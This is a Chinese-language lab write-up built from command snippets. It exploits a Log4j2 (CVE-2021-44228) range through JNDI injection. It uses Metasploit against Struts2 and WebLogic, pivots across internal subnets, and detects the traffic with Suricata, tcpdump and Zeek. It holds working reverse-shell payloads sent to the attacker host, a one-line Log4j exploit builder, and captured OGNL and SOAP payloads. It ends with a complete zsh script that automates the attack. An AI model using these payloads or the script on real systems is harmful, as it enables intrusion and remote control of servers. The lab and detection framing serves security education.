1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

sudo apt update && sudo apt install -y docker.io docker-compose jq

# 将当前用户添加到 docker 用户组，免 sudo 执行 docker 相关指令
# 重新登录 shell 生效
sudo usermod -a -G docker ${USER}

# 切换到 root 用户
sudo su

# 使用国内 Docker Hub 镜像源（可选步骤）
# 国内 Docker Hub 镜像源可用性随时可能变化，请自测可用性
sudo mkdir -p /etc/docker

sudo tee /etc/docker/daemon.json <<-'EOF'
{
 "registry-mirrors": ["https://docker.chenby.cn"]
}
EOF

sudo systemctl daemon-reload

sudo systemctl restart docker

1

docker exec -it eloquent_boyd bash

1

docker cp eloquent_boyd:/demo/demo.jar ./

1
2
3
4
5
6

#进入 docker 容器中，找到系统中预置的 shell并利用找到 demo.jar
cat /etc/shells
docker exec -it {container_name} /bin/bash

# docker exec -it {container_name} sh
# 如果已经预设则可以直接进入shell

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

package BOOT-INF.classes.com.example.log4j2_rce;

import java.io.IOException;
import javax.servlet.http.HttpServletResponse;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.ResponseBody;
import org.springframework.web.bind.annotation.RestController;

@SpringBootApplication
@RestController
public class Log4j2RceApplication {
 private static final Logger logger = LogManager.getLogger(com.example.log4j2_rce.Log4j2RceApplication.class);

 public static void main(String[] args) {
 SpringApplication.run(com.example.log4j2_rce.Log4j2RceApplication.class, args);
 }

 @GetMapping({"", "/"})
 public String aaa(HttpServletResponse response) throws IOException {
 response.getOutputStream().write("<h2>Struts Problem Report</h2><br/><a href=\"/hello?payload=111\">我哈哈哈哈</a>".getBytes());
 return "<h2>Struts Problem Report</h2><br/><a href=\"/hello?payload=111\">我哈哈哈哈</a>";
 }

 @GetMapping({"/hello"})
 @ResponseBody
 public String hello(String payload) {
 System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
 System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
 logger.error("{}", payload);
 logger.info("{}", payload);
 logger.info(payload);
 logger.error(payload);
 return "ok";
 }
}

1
2

 System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
 System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");

1

#Lookups 是一种功能，允许在日志消息中动态地插入特定类型的数据。它们通过`${}`语法嵌入在日志消息中，可以在运行时被替换为相应的值或结果。

1
2
3
4
5
6

# 编码内容 : ${jndi:ldap://ottlt5.dnslog.cn/dalechu}

# 编码结果 : %24%7Bjndi%3Aldap%3A%2F%2F95p55c.dnslog.cn%2Fdalechu%7D

# curl 命令 :
curl "http://192.168.5.132:50721/hello?payload=%24%7Bjndi%3Aldap%3A%2F%2F95p55c.dnslog.cn%2Fdalechu%7D"

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

git clone https://github.com/fullhunt/log4j-scan.git

cd log4j-scan

# 安装依赖
pip install -r requirements.txt

# 在 log4j-scan.py 的 post_data_parameters 中手动添加 payload 参数或无脑替换 : 
sed -i.bak 's/password"/password", "payload"/' log4j-scan.py

# 将 log4j-scan.py 文件 349 行处的 GET 请求参数中的 `v` 改为 `payload` 

# 扫描靶场容器, 注意这里使用 get 而不是 post !!!
python log4j-scan.py --request-type get -u http://192.168.5.132:49576/hello --dns-callback-provider dnslog.cn

1
2
3
4
5
6
7

hostnamectl set-hostname attacker

# 在 /etc/hosts 文件中添加 127.0.0.1 和 attacker 的记录

# 重启系统

# 同样, 另一台虚拟机的主机名改为 victim

1

sudo apt install tmux asciinema

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

# 建立名为 session_name 的会话
tmux new -s session_name

# 先 Ctrl + B, 再 % : 左右分屏
# 先 Ctrl + B, 再 " : 上下分屏

# 先 Ctrl + B, 再 D : 切换回原先终端环境

# 切换回 session_name 会话中
tmux a -t session_name

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

ip a
# 查看 host-only 网卡 IP 地址

nc -l -p 7777

# 当可以进入 victim 虚拟机的容器后 :

ls
ls /tmp
ps aux

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

# 查看当前运行中的容器
sudo docker ps

# 复制目标容器名

# 进入容器 agitated_curie 内
sudo docker exec -it agitated_curie /bin/bash

# 进入容器后, 执行 :
bash -i >& /dev/tcp/192.168.5.134/7777 0>&1
# 这里的 192.168.5.134 为 attacker 虚拟机 host-only 网卡对应 IP 地址

# 启动一个交互式的 bash shell. 将该 shell 的标准输入、标准输出和标准错误重定向到通过 TCP 连接到 192.168.5.134:7777 的套接字
# 这样，任何从 192.168.5.134 上的 7777 端口发送的数据都会作为 bash shell 的输入，bash shell 的输出也会发送回 192.168.5.134 上的 7777 端口

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

# 开启 JNDI 服务
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.5.134

# 监听端口，等待靶标容器连接
nc -l -p 7777

# 发送包含访问恶意命令（ Base64 编码的反弹 Shell 命令）地址的 HTTP 请求
sudo apt install xxd

# 使用教程中的命令格式报错了, 发现是这里又出现了 POST 请求不允许的情况，于是使用 GET请求进行替代

# 这里还出现了 URL 编码问题, 改为 GET 请求后，Bash 命令的 Base64 编码也需要修改, 如下 : 

SHELL_COMMAND="bash -i >& /dev/tcp/192.168.5.134/7777 0>&1" && BASE64_PAYLOAD=$(echo -n "$SHELL_COMMAND" | base64 -w 0 | sed 's/+/%2B/g' | sed 's/=/%3d/g') && TARGET_URL="http://192.168.5.132:53860/hello" && FULL_PAYLOAD="\${jndi:ldap://192.168.5.134:1389/TomcatBypass/Command/Base64/${BASE64_PAYLOAD}}" && URL_FULL_PAYLOAD=`echo ${FULL_PAYLOAD} | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g' ` && curl "${TARGET_URL}?payload=${URL_FULL_PAYLOAD}"

1

curl "http://192.168.4.129:43381/hello?payload=${jndi:ldap://192.168.182.130:1389/TomcatBypass/Command/Base64/'$(echo -n 'bash -i >& /dev/tcp/192.168.182.130/7777 0>&1' | base64 -w 0 | sed 's/+/%252B/g' | sed 's/=/%253d/g')'}"

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

# 反弹 Shell 命令
SHELL_COMMAND="bash -i >& /dev/tcp/192.168.182.130/7777 0>&1"
# Base64 编码
BASE64_PAYLOAD=$(echo -n "$SHELL_COMMAND" | base64 -w 0 | sed 's/+/%2B/g' | sed 's/=/%3d/g')
# 拼接 URL
TARGET_URL="http://192.168.182.129:43381/hello"
FULL_PAYLOAD="\${jndi:ldap://192.168.182.130:1389/TomcatBypass/Command/Base64/${BASE64_PAYLOAD}}"
# URL 编码
URL_FULL_PAYLOAD=`echo ${FULL_PAYLOAD} | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g' `
# 发送 GET 请求
curl "${TARGET_URL}?payload=${URL_FULL_PAYLOAD}"

# curl 的 GET 请求
# http://192.168.182.129:43381/hello?payload=%24%7b%6a%6e%64%69%3a%6c%64%61%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%38%32%2e%31%33%30%3a%31%33%38%39%2f%54%6f%6d%63%61%74%42%79%70%61%73%73%2f%43%6f%6d%6d%61%6e%64%2f%42%61%73%65%36%34%2f%59%6d%46%7a%61%43%41%74%61%53%41%25%32%42%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4f%54%49%75%4d%54%59%34%4c%6a%45%34%4d%69%34%78%4d%7a%41%76%4e%7a%63%33%4e%79%41%77%50%69%59%78%7d%0a

# 一行命令
SHELL_COMMAND="bash -i >& /dev/tcp/192.168.182.130/7777 0>&1" && BASE64_PAYLOAD=$(echo -n "$SHELL_COMMAND" | base64 -w 0 | sed 's/+/%2B/g' | sed 's/=/%3d/g') && TARGET_URL="http://192.168.182.129:43381/hello" && FULL_PAYLOAD="\${jndi:ldap://192.168.182.130:1389/TomcatBypass/Command/Base64/${BASE64_PAYLOAD}}" && URL_FULL_PAYLOAD=`echo ${FULL_PAYLOAD} | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g' ` && curl "${TARGET_URL}?payload=${URL_FULL_PAYLOAD}"

# 注意 ! 这么强悍的一行命令是我们的 lihan3238 同学亲自手搓出来的 ! 代价是他整整研究了一个下午 ! 

1
2

sudo ip link set eth0 up # 将网卡 eth0 设置为 UP
sudo dhclient eth0 # 获取 IP 地址

1
2
3
4
5

# 编辑 /etc/network/interfaces 文件, 添加 :
auto eth0
iface eth0 inet dhcp

# 如此, 系统启动时会自动启用网络接口 eth0, 并使用 DHCP 分配 IP 地址

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

# 启动 suricata 检测容器, 此处 eth1 为 victim 虚拟机的 host-only 网卡
docker run -d --name suricata --net=host -e SURICATA_OPTIONS="-i eth1" jasonish/suricata:latest

# 更新 suricata 规则，更新完成测试完规则之后会自动重启服务
docker exec -it suricata suricata-update -f

# 重启 suricata 容器以使规则生效
docker restart suricata

# 在重复上次 jndi 渗透过程同时, 开辟新的 victim 终端窗口来监视 suricata 日志 :
docker exec -it suricata tail -f /var/log/suricata/fast.log

1
2

log4j2支持多种日志级别，通过日志级别我们可以将日志信息进行分类，在合适的地方输出对应的日志。哪些信息需要输出，哪些信息不需要输出，只需在一个日志输出控制文件中稍加修改即可。级别由高到低共分为6个：`fatal(致命的)`, `error`, `warn`, `info`,` debug`, `trace`(堆栈)。
log4j2还定义了一个内置的标准级别`intLevel`，由数值表示，级别越高数值越小。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

# log4j2.xml

<?xml version="1.0" encoding="UTF-8"?>

<configuration status="error">
 <appenders>
<!-- 配置Appenders输出源为Console和输出语句SYSTEM_OUT-->
 <Console name="Console" target="SYSTEM_OUT" >
<!-- 配置Console的模式布局-->
 <PatternLayout pattern="%d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %level %logger{36} - %msg%n"/>
 </Console>
 </appenders>
 <loggers>
 <root level="error">
 <appender-ref ref="Console"/>
 </root>
 </loggers>
</configuration>

1
2

 System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
 System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

Exception in thread "main" java.lang.IllegalStateException: Failed to get nested archive for entry BOOT-INF/lib/jackson-annotations-2.9.0.jar
 at org.springframework.boot.loader.archive.JarFileArchive.getNestedArchive(JarFileArchive.java:108)
 at org.springframework.boot.loader.archive.JarFileArchive.getNestedArchives(JarFileArchive.java:86)
 at org.springframework.boot.loader.ExecutableArchiveLauncher.getClassPathArchives(ExecutableArchiveLauncher.java:70)
 at org.springframework.boot.loader.Launcher.launch(Launcher.java:49)
 at org.springframework.boot.loader.JarLauncher.main(JarLauncher.java:51)
 Caused by: java.io.IOException: Unable to open nested jar file 'BOOT-INF/lib/jackson-annotations-2.9.0.jar'
 at org.springframework.boot.loader.jar.JarFile.getNestedJarFile(JarFile.java:256)
 at org.springframework.boot.loader.jar.JarFile.getNestedJarFile(JarFile.java:241)
 at org.springframework.boot.loader.archive.JarFileArchive.getNestedArchive(JarFileArchive.java:103)
 ... 4 more
 Caused by: java.lang.IllegalStateException: Unable to open nested entry 'BOOT-INF/lib/jackson-annotations-2.9.0.jar'. It has been compressed and nested jar files must be stored without compression. Please check the mechanism used to create your executable jar file
 at org.springframework.boot.loader.jar.JarFile.createJarFileFromFileEntry(JarFile.java:284)
 at org.springframework.boot.loader.jar.JarFile.createJarFileFromEntry(JarFile.java:264)
 at org.springframework.boot.loader.jar.JarFile.getNestedJarFile(JarFile.java:252)
 ... 6 more

1

export JAVA_OPTS="$JAVA_OPTS -Dlog4j2.formatMsgNoLookups=true"

1
2
3
4
5

# 建议放到 tmux 会话
container_name="12499e844404"
docker run --rm --net=container:${container_name} -v ${PWD}/tcpdump/${container_name}:/tcpdump kaazing/tcpdump

# 置于后台, 快捷键 Ctrl + B, D

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

# 切换到攻击者主机 attacker 进行 metasploit 基础配置
# sudo apt install -y metasploit-framework
# 在 2024 版本 kali 中, metasploit-framework 是自带的, 无需再手动安装.

# 初始化 metasploit 本地工作数据库及启动 :
sudo msfdb init && msfconsole

# 确认已连接 pgsql
db_status

# 建立工作区
workspace -a demo

# 查看工作区
workspace -l

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

# search exp in metasploit
search struts2 type:exploit

# 查看模块信息, 参数选择 exploit/multi/http/struts2_multi_eval_ognl 对应的序号
info <编号>

# 根据输出内容, 继续完善搜索关键词 :
search S2-059 type:exploit

# 使用此 exp
use <编号>

1
2
3
4
5

# 查看 payloads 列表
show payloads

# 使用合适的 payload
set payload payload/cmd/unix/reverse_bash

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

# 靶机 IP
set RHOSTS 192.168.5.132

# 靶机目标端口
set rport 43067

# 攻击者主机 IP
set LHOST 192.168.5.135

# 查看参数列表, 确认一遍
show options

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

# getshell
exploit -j

# 如果攻击成功，查看打开的 reverse shell
sessions -l

# 进入会话 1
sessions -i 1
# 无命令行交互提示信息，试一试 Bash 指令

# 寻找 flag
ls /tmp

#挂后台
# 快捷键 Ctrl-Z, Y

1
2
3
4
5
6

# upgrade cmdshell to meterpreter shell
sessions -u 1

sessions l

sessons -i 2

1
2
3
4
5
6
7
8

# 查看网卡信息
ipconfig

# 查看路由表 
route

# 查看 ARP 缓存
arp

1
2
3
4
5
6
7

# 根据上面的内容, 创建路由 :
run autoroute -s 192.175.84.1/24

# 检查 Pivot 路由是否已创建成功
run autoroute -p

# 挂后台, 快捷键 Ctrl-Z, Y

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

search portscan
use auxiliary/scanner/portscan/tcp
show options

# 根据子网掩码推导
set RHOSTS 192.175.84.2-254

# 根据「经验」
set ports 7001

# 根据「经验」
set threads 10

run -j

hosts

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

# 查看发现的服务列表
services

# 建立 socks5 代理

search socks_proxy
use auxiliary/server/socks_proxy
run -j

# 查看后台建立 socks5 代理是否成功
jobs -v

1
2
3
4
5
6
7
8
9

# 开启新的终端窗口
# 查看 1080 端口
sudo lsof -i tcp:1080 -l -n -P

# 编辑 /etc/proxychains4.conf
sudo sed -i.bak -r "s/socks4\s+127.0.0.1\s+9050/socks5 127.0.0.1 1080/g" /etc/proxychains4.conf

# 使用 proxychains 命令扫描内网主机
proxychains sudo nmap -vv -n -p 7001 -Pn -sT 192.175.84.2-5

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

# 回到 metasploit 环境
# 进入 sessions 1 会话
sessions l

sessions -i 1

curl http://192.175.84.2:7001 -vv
curl http://192.175.84.3:7001 -vv
curl http://192.175.84.4:7001 -vv
curl http://192.175.84.5:7001 -vv

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

# search exploit
search cve-2019-2725

# getshell
use 0

set lhost 192.168.5.135

set RHOSTS 192.175.84.2
# set RHOSTS 192.175.84.3
# set RHOSTS 192.175.84.4
# 分别设置不同的靶机 IP 

show options

# 分别 run
run -j

# get flag2-4
sessions -c "ls /tmp" -i 3,4,5

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

# 查看三台靶机的 IP 配置，并发现 session 5 的主机有三个网卡，说明该主机同时又在另一个网段底下，所以 session 5 内连接的这台主机可以考虑作为跳板主机，即 192.175.84.5
sessions -c "ifconfig" -i 3,4,5

# session 5 升级，并生成 session 6 
sessions -u 5

# 进入 session 6 ( 即进入跳板主机内，该跳板主机另一张网卡的 IP 是 192.176.85.2 )
sessions -i 6

# 将新发现的子网加入 Pivot Route
run autoroute -s 192.176.85.0/24

# 检查新发现的子网是否加入成功，留意一下输出结果的子网掩码
run autoroute -p

# 按快捷键 CTRL-Z , Y 置于后台

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

# 再次使用端口扫描服务
use scanner/portscan/tcp

# 根据上面的子网掩码推出来的扫描范围
set RHOSTS 192.176.85.2-254

# 扫描端口设置为 80
set ports 80

# 开始扫描
run

# 查看服务列表
services

# 查看该网段下存活主机
hosts

# 再次进入会话 6
sessions -i 6

1
2
3
4
5
6
7

sessions -c "wget http://192.176.85.3" -i 6

# 发现没有命令执行回显，试试组合命令
sessions -c "wget http://192.176.85.3 -O /tmp/result && cat /tmp/result" -i 6

# 发现 get flag 提示
sessions -c "wget 'http://192.176.85.3/index.php?cmd=ls /tmp' -O /tmp/result && cat /tmp/result" -i 6

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

# 2.sh
#!/bin/bash
/etc/init.d/nginx start && /etc/init.d/php7.2-fpm start && ping 127.0.0.1

# Dockerfile
FROM vulshare/nginx-php-flag:latest

COPY ./2.sh /2.sh

RUN chmod +x /2.sh

CMD ["/2.sh"]

# 构建镜像
docker build -t vulshare/nginx-php-flag:latest .

# 重新启动场景

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

git clone --recursive https://github.com/zeek/zeek
./configure && make && sudo make install

# 编辑 /usr/local/zeek/share/zeek/site/local.zeek ，在文件尾部追加两行新配置代码
@load frameworks/files/extract-all-files
@load mytuning.zeek

#在 /usr/local/zeek/share/zeek/site 目录下创建新文件 mytuning.zeek ，内容为：
zeek -r tcpdump.pcap /usr/local/zeek/share/zeek/site/local.zeek

# 运行 `zeek` 分析流量
zeek -r ./tcpdump/[]/tcpdump.pcap

1
2
3

elsif cve == 'CVE-2020-17530'
 http_request_parameters['method'] = 'POST'
 http_request_parameters['vars_post'] = { datastore['NAME'] => "%{#{ognl}}" }

1
2

# cat extract_files/extract-1721031278.696195-HTTP-F09DHeMj0fa3AJXZf
id=%25%7b%28%23instancemanager%3d%23application%5b%22org.apache.tomcat.InstanceManager%22%5d%29.%28%23stack%3d%23attr%5b%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5d%29.%28%23bean%3d%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3d%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3d%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3d%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2c%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2c%23emptyset%29%29.%28%23execute%3d%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%7b%22bash%20-c%20%7becho%2cYmFzaCAtYyAnMDwmMTg0LTtleGVjIDE4NDw%2bL2Rldi90Y3AvMTkyLjE2OC40LjEzMC80NDQ0O3NoIDwmMTg0ID4mMTg0IDI%2bJjE4NCc%3d%7d%7c%7bbase64%2c-d%7d%7cbash%22%7d%29%29%7d

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

def check
 res = send_request_cgi(
 'uri' => normalize_uri(target_uri.path),
 'method' => 'POST',
 'ctype' => 'text/xml',
 'headers' => { 'SOAPAction' => '' }
 )

...

when 'Unix', 'Solaris'
 string0_cmd = '/bin/bash'
 string1_param = '-c'
 shell_payload = payload.encoded

1
2

# cat extract_files/extract-1721031619.297156-HTTP-FhwTjm4kJ4ayjxLYHl
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"xmlns:wsa="http://www.w3.org/2005/08/addressing"xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>HgyotaNU26Es7IyUbzqd</wsa:Action><wsa:RelatesTo>uCWTSjSfjN8F2jJ4hi2C</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>bash -c '0&lt;&amp;177-;exec 177&lt;&gt;/dev/tcp/192.168.182.130/4444;sh &lt;&amp;177 &gt;&amp;177 2&gt;&amp;177'</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

git clone https://github.com/actor-framework/actor-framework.git
cd actor-framework
mkdir build
cd build
cmake ..
make
sudo make install
# 手动创建 `actor-framework.pc` 文件
ls /usr/local/include/caf
ls /usr/local/lib
sudo mkdir -p /usr/local/lib/pkgconfig
sudo nano /usr/local/lib/pkgconfig/actor-framework.pc
prefix=/usr/local
exec_prefix=${prefix}
libdir=${exec_prefix}/lib
includedir=${prefix}/include

Name: actor-framework
Description: An Open Source Implementation of the Actor Model in C++
Version: 0.18.3 # 根据实际安装的CAF版本修改
Libs: -L${libdir} -lcaf_core -lcaf_io
Cflags: -I${includedir}
sudo chmod -R 755 /home/kali/attack_test/test1/zeek/build
sudo chown -R $USER:$USER /home/kali/attack_test/test1/zeek/build

export PKG_CONFIG_PATH=/usr/local/lib/pkgconfig:$PKG_CONFIG_PATH
export LD_LIBRARY_PATH=/usr/local/lib:$LD_LIBRARY_PATH

#再次编译 `zeek`，成功
cd /path/to/zeek/build
make clean
cmake -DCMAKE_LIBRARY_PATH=/usr/local/lib ..
cmake ..
make && sudo make install

1
2
3
4
5
6

# Dockerfile
FROM vulfocus/log4j2-cve-2021-44228:latest
CMD ["java","-Dlog4j2.formatMsgNoLookups=true","-jar","/demo/demo.jar"]

# 构建镜像
sudo docker build -t vulfocus/log4j2-cve-2021-44228:latest .

1
2
3
4
5
6
7
8

# kalitargetserver
# 在 tmux 中启动 tcpdump
sudo docker ps
# 将 container_id 替换为指定容器(CVE-2021-44228)的 ID
container_id="56410ce8fa18"
# 指定容器的上下行流量
sudo docker run --rm --net=container:${container_id} -v ${PWD}/tcpdump/${container_id}:/tcpdump kaazing/tcpdump
# Ctrl + B, D 退出 tmux

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

#!/bin/zsh

# 配置变量
ATTACKER_IP="192.168.182.130"
ATTACKER_PORT="7777"
TARGET_IP="192.168.182.129"
JNDI_EXPLOIT_PATH="/path/to/JNDIExploit-1.2-SNAPSHOT.jar"

# 提示用户输入目标端口
read "TARGET_PORT?Enter the target port: "

# 检查目标端口是否为空
if [[ -z "$TARGET_PORT" ]]; then
 echo "Error: Target port cannot be empty"
 exit 1
fi

echo "Using target port: $TARGET_PORT"

# 创建新的 tmux 会话，用于 nc 监听
tmux new-session -d -s nc_listener "nc -l -p $ATTACKER_PORT"

# 创建新的 tmux 会话，用于启动 JNDIExploit
tmux new-session -d -s jndi_exploit "java -jar $JNDI_EXPLOIT_PATH -i $TARGET_IP"

# 构建 payload
SHELL_COMMAND="bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1"
BASE64_PAYLOAD=$(echo -n "$SHELL_COMMAND" | base64 -w 0 | sed 's/+/%2B/g' | sed 's/=/%3d/g')
TARGET_URL="http://$TARGET_IP:$TARGET_PORT/hello"
FULL_PAYLOAD="\${jndi:ldap://$ATTACKER_IP:1389/TomcatBypass/Command/Base64/${BASE64_PAYLOAD}}"
URL_FULL_PAYLOAD=$(echo ${FULL_PAYLOAD} | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g')

# 构建 curl 命令
CURL_COMMAND="curl \"${TARGET_URL}?payload=${URL_FULL_PAYLOAD}\""

# 输出 payload
echo "Sending payload with the following curl command:"
echo $CURL_COMMAND

# 等待1s
sleep 1

# 发送payload
eval $CURL_COMMAND

echo "Attack deployed. Waiting for reverse shell connection..."